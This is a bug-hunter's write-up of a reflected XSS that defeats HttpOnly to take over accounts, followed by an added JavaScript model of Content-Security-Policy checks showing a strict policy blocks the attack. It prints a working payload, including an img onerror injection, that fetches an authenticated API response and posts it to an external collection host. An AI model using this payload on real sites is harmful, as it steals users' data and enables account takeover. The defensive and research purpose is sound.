Defeat the HttpOnly flag to achieve Account Takeover | RXSS

Achieving Account Takeover:

The first thing I did was start analyzing the source code and JS files to look for any API key, secret token, CSRF token, etc.

fetch('https://api.target.com/home/v1/UserPersonalization/mymodules?more=true', {
  method: 'get',
  credentials: 'include',   // the browser attaches the session cookie; HttpOnly only hides it from document.cookie
  headers: {
    'Content-Type': 'application/json'
  }
}).then(response => response.text())
  .then(data => {
    // forward the authenticated API response to an external collection endpoint
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://timooon.free.beeceptor.com/data');
    xhr.send(data);
  });

// The same logic delivered through the reflected XSS as an <img> onerror handler:
<img src onerror="fetch('https://api.target.com/home/v1/UserPersonalization/mymodules?more=true', {
  method: 'get',
  credentials: 'include',
  headers: {
    'Content-Type': 'application/json'
  }
}).then(response => response.text()).then(data => {
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://timooon.free.beeceptor.com/data');
  xhr.send(data);
});">
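As an added example (not part of the original post), the following checks whether a Content-Security-Policy would have stopped the two halves of the payload above: the inline onerror handler and the cross-origin XHR to the collection host. The page origin `https://www.target.com` and both policy strings are constructed for illustration; it models the common CSP source forms ('self', scheme, host with optional wildcard and port) rather than the full specification.

```javascript
// Parse a CSP header into { directiveName: [source, ...] }; the first occurrence of a directive wins.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !(name.toLowerCase() in directives)) directives[name.toLowerCase()] = sources;
  }
  return directives;
}
// Does one source expression ('self', a scheme, or a host with optional wildcard/port) match url?
function sourceMatches(src, url, pageOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return url.origin === pageOrigin;
  if (src === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return url.protocol === src.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/']+)(?::(\d+|\*))?$/i.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme.toLowerCase() + ':' !== url.protocol) return false;
  const h = url.hostname.toLowerCase(), want = host.toLowerCase();
  if (wildcard ? !h.endsWith('.' + want) : h !== want) return false;
  const urlPort = url.port || (url.protocol === 'https:' ? '443' : '80');
  return !port || port === '*' || port === urlPort;
}
// Would a fetch/XHR from a page at pageOrigin to destination be permitted?
function connectAllowed(header, destination, pageOrigin) {
  const d = parseCsp(header);
  const sources = d['connect-src'] || d['default-src'];
  if (!sources) return true;   // no governing directive: the browser imposes no restriction
  const url = new URL(destination);
  return sources.some(src => sourceMatches(src, url, pageOrigin));
}
// Would an inline event handler such as onerror="..." execute? Only 'unsafe-inline' allows it,
// and it is ignored once a nonce or hash is present ('unsafe-hashes' is not modelled here).
function inlineHandlerAllowed(header) {
  const d = parseCsp(header);
  const sources = d['script-src'] || d['default-src'];
  if (!sources) return true;
  const nonceOrHash = sources.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return sources.includes("'unsafe-inline'") && !nonceOrHash;
}
const PAGE = 'https://www.target.com';                     // assumed origin of the vulnerable page
const COLLECTOR = 'https://timooon.free.beeceptor.com/data';
const WEAK = "default-src 'self' 'unsafe-inline' https:";  // permits both halves of the payload
const STRICT = "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; connect-src 'self' https://api.target.com";
console.log(inlineHandlerAllowed(WEAK), connectAllowed(WEAK, COLLECTOR, PAGE));       // true true
console.log(inlineHandlerAllowed(STRICT), connectAllowed(STRICT, COLLECTOR, PAGE));   // false false
```

Note that STRICT still lets the application's own call to api.target.com through, so the mitigation does not break the legitimate request, only the inline handler and the outbound post.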

Mohamed Tarek

Engineering Student | Bug Hunter | Penetration tester | CTF Player